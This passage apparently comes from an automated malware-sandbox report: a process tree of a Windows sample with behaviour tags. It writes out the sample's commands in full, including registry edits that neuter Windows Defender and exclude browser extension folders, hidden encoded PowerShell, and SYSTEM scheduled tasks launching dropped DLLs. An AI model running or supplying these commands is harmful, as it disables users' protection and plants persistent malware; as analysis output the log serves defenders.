REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSdUUxlDv" /SC once /ST 03:59:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSdUUxlDv"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSdUUxlDv"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 04:19:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\VCbtqsa.exe\" XT /DGsite_idXfv 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BAnwxolbGpCzXNxkj"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\VCbtqsa.exeC:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\VCbtqsa.exe XT /DGsite_idXfv 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWycNackLSywaqkmgR"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\BxXtXE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\PpiHwYq.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qbSDwEgyNYPZlGA"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\XeAyGFf.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\MqgVxNO.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\qlQDfMu.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\gjqUqPX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 04:11:29 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\WRgCsQCI\TIcELzH.dll\",#1 /lgsite_idSdY 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "QhciBzJOokLnyYZub"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"2⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\WRgCsQCI\TIcELzH.dll",#1 /lgsite_idSdY 3851181⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\WRgCsQCI\TIcELzH.dll",#1 /lgsite_idSdY 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QhciBzJOokLnyYZub"3⤵
-
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\RQEkPGX.exeC:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\RQEkPGX.exe em /hHsite_idEnW 385118 /S1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t 